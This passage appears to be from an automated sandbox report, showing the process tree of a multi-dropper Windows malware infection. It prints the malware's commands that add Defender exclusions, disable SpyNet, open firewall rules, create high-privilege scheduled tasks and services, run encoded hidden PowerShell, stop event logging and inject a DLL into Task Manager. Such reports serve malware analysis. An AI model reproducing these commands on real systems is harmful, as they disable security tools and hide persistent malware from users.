    3⤵
    PID:4428
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4396
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3916
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4976
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4568
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:880
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1468
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4892
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5140
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5148
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5160
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5180
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5204
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5212
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5224
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5244
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5256
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5264
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5280
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5288
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5336
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5380
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5408
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5428
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5444
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5468
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5504
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5524
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5580
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5600
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5628
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5652
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5728
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5744
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5752
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5784
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5796
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5808
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5824
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5832
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5840
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5848
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5860
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5872
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5884
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5892
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5908
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5916
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5924
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5940
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5948
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5968
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5976
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5988
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5996
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6012
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 552
      4⤵
      Program crash
      PID:3048
- C:\Users\Admin\Documents\GuardFox\crtjW9FdAFh1RpA0LLVUF2bK.exe
  "C:\Users\Admin\Documents\GuardFox\crtjW9FdAFh1RpA0LLVUF2bK.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of SetWindowsHookEx
  PID:4472
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4788
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3956
- C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe
  "C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:848
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5420
- - C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe
    "C:\Users\Admin\Documents\GuardFox\brfAj59VD3dbF2T6UbdmVF89.exe"
    3⤵
    PID:5264
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5940
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5508
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:4352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5756
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2248
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:5356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5796
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:5708
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:3112
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:6008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4744
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1544
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:1792
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:4056
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:3096
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:1784
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:2884
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2184
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:4476
- C:\Users\Admin\Documents\GuardFox\XGRjqH3jMgozHbf6PoVnfQTH.exe
  "C:\Users\Admin\Documents\GuardFox\XGRjqH3jMgozHbf6PoVnfQTH.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1856
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 2080
    3⤵
    - Program crash
    PID:1196
- C:\Users\Admin\Documents\GuardFox\I9ymkTTokwU3_itoLBYFoASS.exe
  "C:\Users\Admin\Documents\GuardFox\I9ymkTTokwU3_itoLBYFoASS.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 340
    3⤵
    - Program crash
    PID:5400
- C:\Users\Admin\Documents\GuardFox\y1JwebHBmbC_K8bpIfqY7dAT.exe
  "C:\Users\Admin\Documents\GuardFox\y1JwebHBmbC_K8bpIfqY7dAT.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3868
- - C:\Users\Admin\AppData\Local\Temp\is-IFGOF.tmp\y1JwebHBmbC_K8bpIfqY7dAT.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-IFGOF.tmp\y1JwebHBmbC_K8bpIfqY7dAT.tmp" /SL5="$B020A,1650664,56832,C:\Users\Admin\Documents\GuardFox\y1JwebHBmbC_K8bpIfqY7dAT.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe
      "C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4744
  - - C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe
      "C:\Users\Admin\AppData\Local\Magic Mail Monitor\magicmailmonitor.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4316
- C:\Users\Admin\Documents\GuardFox\AfqN23MB7ZIBJA6OIzESsczD.exe
  "C:\Users\Admin\Documents\GuardFox\AfqN23MB7ZIBJA6OIzESsczD.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3432
- - C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Users\Admin\AppData\Local\Temp\7zS7560.tmp\Install.exe
      .\Install.exe /GtPVdidgVAIC "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:4400
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:3032
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:5804
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:4396
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:5124
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:5684
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:3264
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:4948
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:4928
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "guMEFEOEH" /SC once /ST 00:37:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:5472
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "guMEFEOEH"
        5⤵
        
        PID:5048
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "guMEFEOEH"
        5⤵
        
        PID:5720
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bVVEtlzJxMROejURst" /SC once /ST 18:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\QlvXnnUJUMNwlEU\JgZkRLp.exe\" eu /xosite_idMQk 525403 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:4124
- C:\Users\Admin\Documents\GuardFox\oMPmIJRvLAHQ1Yl4K6ywiUDD.exe
  "C:\Users\Admin\Documents\GuardFox\oMPmIJRvLAHQ1Yl4K6ywiUDD.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  PID:4600
- C:\Users\Admin\Documents\GuardFox\O8XFuPPqGVPZVYUYSnSNUfon.exe
  "C:\Users\Admin\Documents\GuardFox\O8XFuPPqGVPZVYUYSnSNUfon.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3488
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5836
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5844
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5852
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5864
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "PHSWJLZY"
    3⤵
    - Launches sc.exe
    PID:5876
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "PHSWJLZY" binpath= "C:\ProgramData\jndraacsywhc\todymdgvwmgb.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4640
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5320
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "PHSWJLZY"
    3⤵
    - Launches sc.exe
    PID:5552
- C:\Users\Admin\Documents\GuardFox\1d1mNOghqDYI4YsW8IbJNqwz.exe
  "C:\Users\Admin\Documents\GuardFox\1d1mNOghqDYI4YsW8IbJNqwz.exe"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:5080
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\GuardFox\1d1mNOghqDYI4YsW8IbJNqwz.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:5968
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:3488
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 2000
    3⤵
    - Program crash
    PID:3228
- C:\Users\Admin\Documents\GuardFox\oI1ZPB2vxSetVpZWfFiI6Wgi.exe
  "C:\Users\Admin\Documents\GuardFox\oI1ZPB2vxSetVpZWfFiI6Wgi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3004
- - C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
    C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:716
  - - C:\Users\Admin\AppData\Local\Temp\2.3.1.1.exe
      C:\Users\Admin\AppData\Local\Temp\2.3.1.1.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4648
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5736
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1764
        5⤵
        Program crash
        
        PID:5160
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5688
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1780
        5⤵
        Program crash
        
        PID:3640
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 1772
        5⤵
        Program crash
        
        PID:2520
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5272
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5136
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 1784
        5⤵
        Program crash
        
        PID:2888
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 1776
        5⤵
        Program crash
        
        PID:3336
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
